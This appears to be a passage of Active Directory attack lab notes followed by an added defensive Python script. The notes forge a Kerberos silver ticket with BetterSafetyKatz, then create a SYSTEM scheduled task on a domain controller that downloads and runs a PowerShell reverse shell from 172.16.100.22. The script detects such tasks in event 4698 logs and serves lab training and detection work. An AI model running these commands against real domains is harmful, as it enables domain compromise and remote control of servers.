
Now that we have the DC's secrets, let's forge a silver ticket for the HOST service on the DC:
.\BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /service:HOST /target:dcorp-dc.dollarcorp.moneycorp.local /aes256:b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd /startoffset:0 /endin:600 /renewmax:10080 /id:500 /ptt"' "exit"

Now let's list the tickets:
klist

Now let's create a scheduled task that gives me a reverse shell:
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"
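
On the detection side, a task created this way is recorded on the DC as Security event 4698 ("A scheduled task was created"), whose TaskContent field holds the task XML. The following is an added example, not part of the original notes: it triages that XML for a SYSTEM task whose action is a script host fetching remote content. The function names, the pattern lists and both sample tasks are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
# Illustrative pattern lists (assumptions); tune them for your environment.
SCRIPT_HOST = re.compile(r"(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?$", re.I)
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b|https?://", re.I)

def triage_task(task_xml):
    """Return findings for one Task Scheduler XML definition (4698 TaskContent)."""
    root = ET.fromstring(task_xml)
    user = root.findtext("t:Principals/t:Principal/t:UserId", "", NS).strip().lower()
    findings = []
    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS).strip().strip('"')
        arguments = action.findtext("t:Arguments", "", NS)
        # Flag only when a script host is combined with download/execute arguments.
        if SCRIPT_HOST.search(command) and DOWNLOAD_EXEC.search(arguments):
            findings.append("script host fetches and runs remote content: " + command)
            if user in SYSTEM_IDS:
                findings.append("action runs as SYSTEM")
    return findings

def task_xml(user_id, command, arguments):
    """Build a minimal task definition; constructed sample data, not a real log."""
    return (
        '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f'<Principals><Principal id="Author"><UserId>{user_id}</UserId></Principal></Principals>'
        f'<Actions Context="Author"><Exec><Command>{command}</Command>'
        f"<Arguments>{arguments}</Arguments></Exec></Actions></Task>")

# Constructed samples: 192.0.2.10 is a documentation address, sample.ps1 a placeholder.
SUSPICIOUS = task_xml("S-1-5-18", "powershell.exe",
    "-c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://192.0.2.10/sample.ps1'')'")
BENIGN = task_xml("S-1-5-18", r"C:\Windows\System32\defrag.exe", "-c -h -o")

if __name__ == "__main__":
    for name, xml in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, triage_task(xml))
```

Event 4698 is only logged when object-access auditing for scheduled tasks is enabled on the host, so confirm the audit policy before relying on this check.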